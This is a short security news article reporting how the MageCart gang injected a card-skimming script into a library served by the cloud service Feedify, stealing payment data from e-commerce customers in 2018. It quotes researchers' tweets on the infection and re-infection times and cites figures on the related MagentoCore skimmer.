MageCart crime gang appears very active in this period, payment card data from customers of hundreds of e-commerce websites may have been stolen due to the compromise of the cloud service firm Feedify.
Cloud service firm Feedify has over 4,000 customers, it is a cloud platform to engage customers’ clients with powerful tools that target them based on their behavior.
Every time user visits a page of the e-commerce site of a Feedify customer will load the malicious script that allowed the crooks to siphon personal information and payment card data.
They've been affected by Magecart since Friday, August 17 2018 @ 16:51:01 GMT as we recorded it. https://t.co/VjD5Qc3Be0
— Yonathan Klijnsma (@ydklijnsma) September 11, 2018
The group has been active since at least 2015 and compromised many e-commerce websites to steal payment card and other sensitive data.
This script records keystrokes from customers and sends them to a server controlled by the attacker.
Typically hackers attempt to compromise third-party features that could allow them to access a large number of websites.
Using the same tactic, the MageCart compromised the website using the Feedify service by injecting their malicious code into a library the Feedify script served to customers’ websites.
According to the experts from RiskIQ, MageCart hackers might have had access to the Feedify servers for nearly a month.
Once notified Feedify the compromise, the company removed the malicious script:
— Placebo (@Placebo52510486) September 11, 2018
but apparently, the hackers re-infected the library.
FYI: Feedify is re-infected with Magecart since about an hour ago, exact time of infection is: Wed, 12 Sep 2018 14:16:02 GMT.
— Yonathan Klijnsma (@ydklijnsma) September 12, 2018
The events demonstrate the ability of the MageCart crime gang in compromising the infrastructure of its victims.
In August, security expert Willem de Groot discovered that the MagentoCore skimmer at the time already infected 7,339 Magento stores.
At the time, querying the PublicWWW service it was possible to verify that the MagentoCore script was deployed on 5,214 domains, actually the number of compromised website id still high (4762) despite the awareness campaign.
(Security Affairs – cybercrime, MageCart)